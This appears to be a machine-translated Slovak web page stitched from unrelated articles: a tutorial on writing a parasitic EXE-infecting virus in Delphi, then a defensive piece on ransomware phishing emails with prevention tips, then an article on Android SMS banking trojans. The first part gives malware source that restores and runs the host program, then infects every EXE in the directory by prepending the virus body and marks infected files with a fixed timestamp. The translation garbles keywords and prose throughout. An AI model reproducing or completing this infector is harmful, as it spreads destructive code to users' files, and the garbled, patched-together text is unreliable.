Klasifikácia

HLLO- Prepísanie jazyka na vysokej úrovni. Takýto vírus prepíše program svojím telom. Tie.
program sa zničí a keď sa používateľ pokúsi program spustiť, vírus sa spustí a „infikuje“ ďalej.

HLLC – High Level Language Companion. Väčšina týchto vírusov pochádza z dávneho staroveku (8-10 rokov dozadu), keď používatelia mali DOS a boli veľmi leniví. Tieto vírusy hľadajú súbor a bez toho, aby ho zmenili, vytvoria svoju kópiu, ale s príponou .COM. Ak lenivý používateľ píše na príkazový riadok iba názov súboru, potom DOS najskôr vyhľadá súbor COM, spustí vírus, ktorý najskôr vykoná svoju prácu a potom spustí súbor EXE. Existuje ďalšia modifikácia
HLLC - modernejší (7 rokov;)): Vírus premenuje súbor, pričom si ponechá názov, ale zmení príponu - z EXE napríklad na OBJ alebo MAP. Vírus nahradí pôvodný súbor svojim telom. Tie. používateľ spustí vírus, ktorý po vykonaní reprodukcie spustí požadovaný program - všetci sú šťastní.

HLLP – High Level Language Parasitic. Najpokročilejší. Priraďte ich telo súboru vpredu (Vírus sa najprv spustí, potom obnoví program a spustí ho) alebo za
- potom do hlavičky programu napíšeme jmp blízko tela vírusu, koniec koncov začína ako prvý.

Samotný program môžeme ponechať nezmenený, potom bude vyzerať takto:

Čo je MZ, myslím, že ste uhádli 🙂 Toto sú iniciály vášho milovaného Marka Zbikowského, ktoré skromne označil ako podpis .exe súbor a 🙂 A zadal som ich sem len preto, aby ste rozumeli
- infekcia prebieha podľa princípu copy /b virus.exe program.exe a nie sú tu žiadne špeciálne vtipy. Teraz nie. Ale dáme ich spolu s vami
- byť zdravý:). Napríklad: prvých 512 alebo viac bajtov pôvodného programu môžete zašifrovať akýmkoľvek známym algoritmom - XOR/XOR, NOT/NOT, ADD/SUB, potom to bude vyzerať takto:

V tomto prípade nebude štruktúra infikovaného súboru taká jasná.
Nie nadarmo som tu (v klasifikácii v zmysle) taký ukrižovaný
- parazitný algoritmus je použitý na 90% moderné vírusy bez ohľadu na spôsob ich distribúcie. Dobre, poďme ďalej:

sieťový vírus. Môže to byť čokoľvek z vyššie uvedeného. Líši sa tým, že jeho distribúcia nie je
obmedzená na jeden počítač, táto infekcia nejako lezie cez internet resp lokálna sieť k iným autám. Myslím, že pravidelne vyťahuješ z mydielka 3-4 takýchto kamarátov
- tu je príklad sieťového vírusu. A raz na cudzom počítači infikuje súbory ľubovoľným spôsobom, alebo neinfikuje Vôbec.

Makrovírusy, skriptové vírusy, IRC vírusy. Dal som ich do jednej skupiny, pretože sú to vírusy napísané v jazykoch zabudovaných v aplikáciách (MSOffice :)), skriptoch (vaše obľúbené pravidlá VBS tu) a IRC skriptoch. Presne vzaté, akonáhle sa v nejakej aplikácii objaví dostatočne výkonný (a/alebo deravý) skriptovací komponent, okamžite naň začnú zapisovať vírusy 😉 Mimochodom, makrovírusy sú veľmi jednoduché a heuristikou ľahko detekovateľné.

kódovanie

Máme to 🙂 No tak, spustite delphi, zabite všetky druhy okien a vymažte všetky nezmysly z okna projektu. To znamená, že vo všeobecnosti vymažte všetko 🙂 Budeme pracovať iba s DPR obsahujúcim:

program EVIL_VIRUS;
POUŽÍVA WINDOWS, SYSTÉMY;
začať
koniec;

Myslím, že ste už pochopili logiku vírusu z klasifikácie - obnovíme a spustíme program --> čakáme na dokončenie jeho práce --> vymažeme "spustený súbor" (zabudol som povedať - NELIIEME infikovaný program, prenesieme pôvodný kód do ľavého súboru a spustíme PRÍKLAD: Infikovaný súbor NOTEPAD.EXE Vytvorte súbor _NOTEPAD.EXE v rovnakom adresári ako pôvodný kód a už ho spustite).--> vyhľadajte neinfikovaný súbor súbor a infikovať. To je všetko 🙂 Základný dizajn vírusu vyzerá takto.

Vyhláste teraz pre svoj mocný mozog nasledujúce premenné a konštanty:

VaR VirBuf, ProgBuf, MyBuf: pole znakov;
SR: TSearchRec;
My,pr: Súbor;
ProgSize,vysledok: integer;
PN,st: Reťazec;
si:Tstartupinfo;
p:tprocessinformation;
infikovaný: booleovský;
CONST VirLen: longint= 1000000;

Prvým riadkom sú dynamické polia, do ktorých napíšeme telo vírusu a program; Zapíše sa premenná SR
charakteristiky nájdeného súboru - kandidáta na infekciu (dúfam, že poznáte postupy FindFirst a FindNext, pretože sa to bude zhoršovať;)), Môj a
Pr je súbor, kde sme začali a ľavý súbor s pôvodným programovým kódom (už som o tom písal vyššie). výsledok - výsledok operácie FindFirst, musí sa rovnať nule,
ProgSize - veľkosť kódu programu. Ostatné je jasné z toho, čo nasleduje, okrem
infikovaný - ide o príznak infekcie nájdeného súboru a
VirLen je dĺžka kódu vírusu, spoznáte ju až po svadbe. Uf, chcel som povedať po kompilácii. Tie. skompilujete, zmeníte hodnotu konštanty v zdrojovom kóde a prekompilujete.
Kódujte ďalej 🙂 Tu môžete vidieť kód zodpovedný za obnovenie a spustenie infikovaného programu:

SetLength(virbuf,VirLen);
AssignFile(my,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile (@st,"c:\windows\program.exe",false);
AK FileSize(my)> VirLen potom
začať
//Spustite program
AssignFile(my,"c:\windows\program.exe);
reset(my);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
SetLength(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
CloseFile(my);
PN:= "_"+ParamStr(0);
AssignFile(pr,pn);
ReWrite(pr);
BlockWrite(pr,progbuf,veľkosť prog);
CloseFile(pr);
FillChar(Si, SizeOf(Si) , 0);
so Si do
začať
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
koniec;
PN:= PN+#0;
Createprocess(nula,@PN,nula,nula,false,Create_default_error_mode,nula,nula,si,p);
waitforsingleobject(p.hProcess,infinite);
//Spustený, program je dokončený. Poďme to vymazať 🙂
ErAsE(pr);
Erase(my);

Všetko je tu v zásade jednoduché a jasné, okrem toho, prečo som preniesol celý infikovaný súbor do adresára Windows a čo robia riadky od 3 do 5 vrátane.
A urobil som to preto, aby som z toho čítal spustený súbor nepríjemné a možné iba pomocou CreateFile a ReadFile WinAPI. O kódovaní na WinAPI budem hovoriť neskôr, teraz sa budem venovať iba základom
- v Delphi.

Tieto riadky sú ľudovou konverziou reťazca na pchar, keďže teraz bojujeme o každý bajt kódu. Ďalší bod: Konal som nesprávne, keď som tak tvrdo nastavil cestu c:\windows. Radšej použite postup GetWindowsDirectory, určite si to zistite 🙂 Všetko ostatné je jasné bez komentárov (ak nie
prestaň vynechávať informatiku ;)), poďme ďalej:

vysledok:= FindFirst("*.exe",faAnyFile,sr);
WHILE Výsledok = 0 DO
začať
// Skontrolujte prítomnosť vší
infikovaný:= falošný;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "08/03/98 06:00:00" then infikovaný:= true;
//Skontrolované!
IF (infected= false) a (sr.name<>paramstr(0)) potom
začať
AssignFile(my,sr.Name);
ReWrite(my);
BlockWrite(moje,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
koniec;
koniec;

//Ak vírus beží "čisto", t.j. nie z infikovaného programu, potom ukončite
koniec inak zastaviť;

Čo je tvoje bystré oko vidí tu? Presne tak, procedúra FindFirst vyhľadá danú obeť (akýkoľvek exe súbor z aktuálneho adresára), prenesie jej charakteristiky do premennej SR. Potom ho musíte skontrolovať na infekciu. Robí sa to originálnym spôsobom: pri infikovaní sa súboru priradí def. dátum a čas. A každý súbor s takýmito vlastnosťami sa považuje za infikovaný. Všetko ostatné je opäť obscénne jednoduché, takže plynulo prechádzam k záveru 🙂

Záver

Takže máme zakódovaný náš prvý vírus. Zatiaľ dokáže infikovať iba súbory v aktuálnom adresári (aj keď som si istý, že ho ľahko upgradujete;)) a nevie nič o iných adresároch a internete. Nezúfajte, čoskoro ho rozbehneme. Zatiaľ sa pohrajte s týmito riadkami a počkajte na ďalší článok.

Aplikácia

Dovolím si vám v článku popísať všetky použité postupy. Pomôže vám to vyhľadať ich v pomocníkovi a pripraviť sa na kódovanie vážnych vírusov
WinAPI.

AssignFile - žiadny analóg vo WinAPI - mapuje súbor
s typ premennej Súbor alebo TextFile

Otvorí sa Reset - analógy _lopen a CreateFile
existujúci súbor a nastavte pozíciu
vrch na čítanie

ReWrite - _lcreate a CreateFile - vytvorí nový súbor a
ústa pozíciu čítania na začiatok. Ak je kŕmené
Prepíšte existujúci súbor, jeho obsah
bude resetovaný

BlockRead - _lread a ReadFile - načítava do vyrovnávacej pamäte
určité množstvo údajov zo súboru

BlockWrite - _lwrite a WriteFile - zapisuje
údaje do súboru

SeekFile - _llseek a SetFilePointer - presunutie pozície
čítanie/zápis do otvoreného súboru

CloseFile - _lclose a CloseHandle - zatvorí otvorené
súbor

Erase - DeleteFile - vymazanie súboru

FindFirst - FindFirstFile - vyhľadávanie súboru podľa kritérií

FindNext - FindNextFile - hľadanie ďalšieho súboru

Zavolajte adminov exorcistov! Hlavný účtovník chytil silný vírus, všetko je preč! Častá, častá situácia založená na ľudskom faktore, čerstvých vírusových trendoch a odhodlaní hackerov. A ozaj, prečo sa sám hrabať v cudzom softvéri, ak sa v tomto môžete spoľahnúť na zamestnancov firmy.

Áno, produkty veľkých verejných a súkromných firiem sú neustále hacknuté, hoci na ich tvorbe a podpore pracujú stovky skúsených ľudí.

A ešte viac, obyčajný človek nemá hackerom čo oponovať. Nikto zároveň nepotrebuje jeden osamelý účet, cieľom hackerov je získať veľkú základňu potenciálnych obetí a spracovať ju reťazovými listami, spamom či vírusmi. A my sami distribuujeme všetky osobno-verejné informácie vpravo a vľavo.

Najnovšie vírusové trendy

Charakteristickým rysom všetkých najnovších vírusov a hackerských techník je, že interagujú s osobou, nie so systémom. To znamená, že samotná obeť začne proces. To sa nazýva " sociálne inžinierstvo"- metóda nezákonného prístupu k informáciám, založená na charakteristikách ľudskej psychológie. A ak sa skorší útočníci museli zmeniť na skutočných detektívov, ktorí sledovali svoje ciele, komunikovali, niekedy dokonca získali prácu v napadnutej spoločnosti, teraz môžeme poďakovať sociálne siete. Výrazne zjednodušili a urýchlili proces zberu informácií.

Prejdením VK, Twitteru, FB a Instagramu svojho cieľa môžete získať presný profil osoby s jej telefónnym číslom, poštou, menami rodičov, priateľov a ďalšími podrobnosťami. A to všetko je bezplatné a dobrovoľné – využite to, drahá!

Čo ak podvodníci získajú prístup k firemná pošta jeden z vašich zamestnancov, spamovanie ohrozuje nielen všetkých v rámci spoločnosti, ale aj vašich zákazníkov. V inom prípade hackeri na dlhší čas znefunkčnia počítač zamestnanca odoslaním akéhosi „hlásenia“ na poštu.

Hackeri plánujú útoky na tých, ktorí pracujú s cennými informáciami – sekretárky, manažérov, účtovníkov, personalistov.

Keďže obnova dokumentov, systémov, webových stránok alebo získanie hesiel vás bude stáť pekný cent musíme pochopiť, s čím máme do činenia. Aby na vás všetci títo „sociálni inžinieri“ nemohli zarobiť, analyzujme jednu z najnovších vírusových schém.

"kryptisti"

Vírus ransomware sa šíri cez e-mailom pod rúškom vážnych dokumentov: súdne výzvy, faktúry, žiadosti z daňového úradu. A aby ste si ho nenainštalovali sami, musíte sa pozrieť na obe strany. Naši technici konkrétne analyzovali jeden takýto vírus, aby sme vám mohli ukázať, na čo si dávať pozor:

Sledujeme ruky týchto kúzelníkov:

  • Hrozivý titul. „Oznámenie o dostavení sa na súd“ znamená „Predvolanie na súd“. Chlapci sa snažia zastrašiť a prinútiť používateľa, aby list otvoril.
  • Adresa odosielateľa - [e-mail chránený] Jasne ukazuje, že nejde o oficiálny list, ale o spammer/hackera.
  • Archív listov. Existuje súbor, ktorý by vás mal okamžite upozorniť (názov súboru obsahuje .doc, ale prípona js - vírus sa maskuje ako dokument programu Word)

Pozor! Ak bol počítač infikovaný ransomware, potom s pravdepodobnosťou 95% budú informácie navždy stratené. Po stiahnutí a spustení škodlivého súboru sa uskutoční hovor na vzdialený server, z ktorého sa stiahne kód vírusu. Všetky údaje v počítači sú šifrované náhodnou sekvenciou znakov.

Na „dekódovanie“ súborov budete potrebovať kľúč, ktorý má iba hacker. Podvodník sľubuje, že informácie za určitú sumu dešifruje späť, no nie je ani zďaleka isté, že sa tak stane. Za čo? Je oveľa jednoduchšie nechať človeka bez peňazí a bez údajov: zmlúv, úkonov, objednávok, akýchkoľvek cenných a citlivých informácií. Tak čo robíš zálohy hlavne dôležitá dokumentácia, bude sa vám lepšie spať. V tejto situácii je to vaša jediná 100% ochrana pred vírusmi.

Venujte pozornosť vyššie uvedeným funkciám a budete môcť zabrániť nebezpečným prípadom blokovania počítačov a vymazania dôležitá informácia. V každom prípade bude náprava dôsledkov kritických zraniteľností oveľa drahšia ako prijatie preventívnych opatrení.

Takže tu je 6 ďalších tipov na detekciu vírusov a prevenciu infekcie:

1. Pravidelne aktualizujte operačný systém a programy. Dôležité aktualizácie, ktoré sa štandardne inštalujú automaticky, je možné zakázať. Ale nie, pretože nové verzie často zatvárajú objavené diery v softvérovej bezpečnosti.

2. Nainštalujte si antivírus a pravidelne aktualizujte vírusovú databázu. Každý deň pribudne 100 tisíc nových vírusov!

3. Povoľte zobrazenie prípon súborov: Ovládací panel\Možnosti priečinka\Zobraziť\Rozšírené možnosti, zrušte začiarknutie možnosti „Skryť prípony známych typov súborov“ a kliknite na tlačidlo OK. Týmto spôsobom vždy uvidíte skutočnú príponu súboru. Najčastejšie maskované vírusy vyzerajú takto: názov_súboru.doc.js a súbor.pdf.exe. Skutočné prípony súborov sú js a exe a všetko pred nimi je súčasťou názvu súboru.

4. Zálohujte si dôležité súbory – pracovné dokumenty a fotografie. Periodicita Rezervovať kópiu musíte si vybrať v závislosti od frekvencie zmien súborov. Na zálohovanie môžete použiť cloudovú službu, ak vám umožní vrátiť sa k starším verziám súborov a nastaviť manuálnu synchronizáciu. Potom sa v prípade napadnutia počítača vírus do cloudu nedostane. Odporúčame tiež, aby ste si kópiu dôležitých údajov uchovávali v archíve. Väčšina vírusov nemôže preniknúť do archívu a všetky archivované informácie sa po dezinfekcii počítača obnovia.

5. Zvýšte odbornú gramotnosť svojich špecialistov! Ako sme už povedali, hackeri prispôsobujú svoje útoky našej psychológii a neustále zdokonaľujú svoje techniky. Nečakajte, že niekto iný okrem vašej spoločnosti a tímu klikne/nahrá/zadá vaše údaje. Chytiť sa môže každý, úlohou je len vybrať ten správny háčik pre človeka. Vyškolte preto svojich zamestnancov aspoň individuálne, aspoň tímovo, aspoň hravou formou, aspoň nejako!

6. Pozorne sledujte listy v pošte, správy v podnikových messengeroch a akékoľvek ďalšie prichádzajúce informácie. Skontrolujte e-mailové adresy, prílohy a obsah e-mailov odosielateľov. Väčšinu vírusov je potrebné spustiť manuálne, aby mohli poškodiť váš počítač.

Naozaj dúfame, že tento článok čítate na ukážku, a nie preto, že je už všetko zlé. Prajeme vám, aby ste sa už nikdy nestretli s totálnym nekontrolovaným spamom, chýbajúcou dokumentáciou počas šiestich mesiacov a ďalšími príjemnými následkami zachytených vírusov. Postupujte podľa šiestich krokov uvedených vyššie, majte oči otvorené a uchovávajte svoje informácie v súkromí!

Používatelia nie vždy dokážu rozpoznať vírus vo svojom mobilnom telefóne, a preto nie je možné vymazať škodlivý program alebo vykonať akúkoľvek akciu skôr, ako vírus získa prístup k osobným údajom.

Na tento moment Smartfóny so systémom Android sú považované za najzraniteľnejšie. V systéme Android sa prostredníctvom SMS objavil nový vírus.

V smartfónoch s open source, čo v skutočnosti je operačný systém Android, nové vírusy sa šíria neuveriteľnou rýchlosťou.

Teraz sa zmenili. Predtým sa pokúšali používať peniaze len v mobilných telefónoch, no dnes sú pod palcom bankové karty a všetky prostriedky, ktoré sú v Internetovej banke. Podvodníci majú záujem predovšetkým o smartfóny, ktoré podporujú službu Mobilná banka. Umožňuje vám ukradnúť peniaze z účtu obete na číslo podvodníka. Aby to urobili, pošlú vírus cez SMS na Android.

Ako fungujú podvodníci

Prvý takýto vírus sa stal aktívnym začiatkom leta 2017. Nebezpečenstvo spočíva v tom, že trójsky kôň funguje na diaľku na smartfóne so systémom Android.

Útočníci posielajú SMS na požadované číslo, takže s cieľom identifikovať prítomnosť tohto vírusu vo svojom mobilnom gadget by majitelia smartfónov mali venovať pozornosť nárastu počtu SMS správ v hodnote 100 rubľov. V dôsledku toho sa z mobilného účtu majiteľa smartfónu vyberie suma, ktorá je násobkom 100.

S cieľom zarobiť značné peniaze je útočník nútený poslať niekoľko SMS trójskych koní z čísla svojej obete. Koniec koncov, nie je jediný, kto v tomto podvodnom reťazci pracuje.

Trójsky kôň sa usadí v miniaplikácii obete a posiela SMS správy z čísla obete na „drahé“ číslo podvodníkov. A práve za tieto SMS správy adresované na toto „drahé“ číslo sa obeti účtuje 100 rubľov. za každú neoprávnenú SMS správu.

Sprostredkovateľmi v tejto schéme môžu byť telekomunikačný operátor, provider a iní partneri, ktorí nemusia vedieť o trikoch podvodníkov. Na pokrytie všetkých výdavkov a zarábanie peňazí musí útočník z každého čísla vybrať aspoň 1 000 rubľov.

Zároveň sa nedá vylúčiť ani možnosť, že sa majitelia smartfónov môžu svojmu operátorovi sťažovať na krádež peňazí. A potom prijmú odvetné opatrenia, ktoré zabránia podvodom. Môžu napríklad zadať požadovaný vstup dodatočné potvrdenie pred odpísaním peňazí atď. V takejto situácii sú útočníci nútení hľadať nové spôsoby podvodu.

Vďaka týmto faktorom sa objavil ďalší trójsky kôň. Tento zástupca Trojan-SMS tiež vykonáva príkazy zo vzdialeného servera.

Nový vírus je flexibilnejší a dokonalejšie sa orientuje v akýchkoľvek podmienkach už s prihliadnutím na bariéry mobilného operátora, a dokonca aj stav účtu účastníka a čas transakcií.

Ako funguje vírus

Nový vírus je nečinný - nemá nezávislosť. Ani raz v smartfóne sa nijako neobjaví. Aby telefón fungoval, potrebuje vzdialený príkaz od vlastníka telefónu.

Na tento účel sa používa takzvaná požiadavka POST. Je určený pre požiadavku, v ktorej webový server akceptuje na uloženie dáta uvedené v tele správy. Často sa používa napríklad na stiahnutie súboru.

Použitie požiadavky POST vám umožňuje spojiť sa s vzdialený server a dostane príslušný príkaz, po prijatí ktorého Trojan začne posielať drahé SMS správy z čísel svojich obetí na čísla podvodníkov.

Ako funguje nový trójsky kôň? Program napríklad automaticky posiela SMS správy s jedným slovom „BALANCE“ na číslo, ktoré podporuje „Mobile Banking“.

Odoslanie SMS správy c krátke číslo, podvodníci tak môžu skontrolovať, či je číslo obete prepojené s bankovým účtom a aký je stav účtu.

Príklady zo života

Napríklad Sberbank má číslo, z ktorého sa odosielajú správy - 900. Keď správa „BALANCE“ (alebo prípadne v ruštine „zostatok“) prichádza od odosielateľa 900, potom vlastník telefónu, ktorý dôveruje Sberbank a je si istý že táto správa je z tejto banky, otvorí správu a odpovie na ňu a chce vedieť, čo sa stalo so zostatkom. Podvodníci tak dostanú odpoveď na svoju SMS, čo pre nich znamená, že a banková karta. Navyše je im jasné, že túto kartu je možné ovládať pomocou SMS príkazov, ktoré sú súčasťou služby Mobile Banking. A potom, ako sa hovorí, „technologická záležitosť“.

Jeden z mojich priateľov nedávno dostal správy z krátkeho čísla 4-74-1, ktoré je zaregistrované v mobilnej banke Sberbank, so správou "Služba nie je k dispozícii, skúste to znova neskôr." Z pochopiteľných dôvodov neposlala odpoveď, už o možných hrozbách vedela. Je zrejmé, že ide o tých istých podvodníkov, ktorí sa tvária ako mobilná banka a snažia sa týmto spôsobom vypočítať jej reakciu a zistiť, či je v jej smartfóne nainštalovaná mobilná banka.